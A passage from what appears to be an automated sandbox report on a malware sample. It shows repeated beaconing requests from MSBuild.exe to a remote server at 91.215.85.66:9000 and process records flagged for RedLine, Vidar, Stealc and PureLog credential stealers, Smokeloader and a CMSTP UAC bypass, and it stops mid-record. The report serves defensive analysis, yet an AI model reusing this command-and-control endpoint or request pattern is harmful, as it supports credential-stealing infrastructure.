88	192.168.2.4	49844	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:45.185904026 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:45.475163937 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49845	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:45.866933107 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:46.148422003 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49846	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:46.531682968 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:46.807986975 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49847	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:47.200371027 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:47.482017994 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49848	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:47.866405964 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:48.141535044 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49849	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:48.537930965 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:48.822940111 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49850	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:49.238565922 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:49.534586906 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:48 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49851	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:49.917922974 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:50.197679043 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49852	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:50.592149019 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:50.877233982 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49853	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:51.278815031 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:51.564326048 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49854	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:51.954097986 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:52.241322041 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49855	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:52.626221895 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:52.907213926 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49856	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:53.295874119 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:53.577192068 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49857	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:53.963723898 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:54.244462013 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49858	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:54.636147022 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:54.916224957 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49859	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:55.296076059 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:55.571515083 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49860	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:55.970257998 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:56.249308109 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49861	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:56.647022963 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:56.928183079 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49862	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:57.318717003 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:57.599565029 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49863	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:57.993165016 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:58.278702974 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49864	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:58.724586964 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:59.005597115 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49865	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:59.897305965 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:29:00.180787086 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49866	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:29:05.759634972 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:29:06.040935040 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:29:05 GMT

Target ID:	0
Start time:	10:26:54
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\QPoX60yhZt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QPoX60yhZt.exe"
Imagebase:	0x400000
File size:	415'233 bytes
MD5 hash:	96B085B3F6EE7441236CEE54161309D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1816995670.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:26:59
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5mc.0.exe"
Imagebase:	0x400000
File size:	267'776 bytes
MD5 hash:	3FEEFB5213B0FF82FD83AC762EF28021
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2129887694.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:27:09
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe"
Imagebase:	0x140000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:27:10
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:27:11
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:27:12
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5mc.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5mc.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1816333516.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:27:13
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 1132
Imagebase:	0x640000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:27:30
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x750000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	10:27:33
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x195067f0000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2024395013.000001950682B000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	10:27:39
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:27:39
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f330000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:27:40
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"
Imagebase:	0x6e0000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	19
